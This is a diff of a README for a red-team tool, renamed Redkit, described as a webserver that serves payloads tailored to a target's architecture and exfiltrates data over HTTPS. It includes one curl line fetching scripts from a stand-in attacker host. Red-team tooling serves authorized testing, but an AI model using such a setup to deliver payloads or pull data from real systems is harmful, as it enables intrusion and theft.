nobodyawesomer/redbag/README.md

-# redbag
+# Redkit
-A red team's toolbag.
+A red team's toolkit webserver.
+Quickly spin up a webserver that can deliver your payloads curated to target architecture, and easily exfiltrate data over https.

+## Current Features

 Creates a webserver in the current directory that serves files out of `bin/`.
 Simply `curl http://attacker.lan:8080/bin/yourscripts.sh`.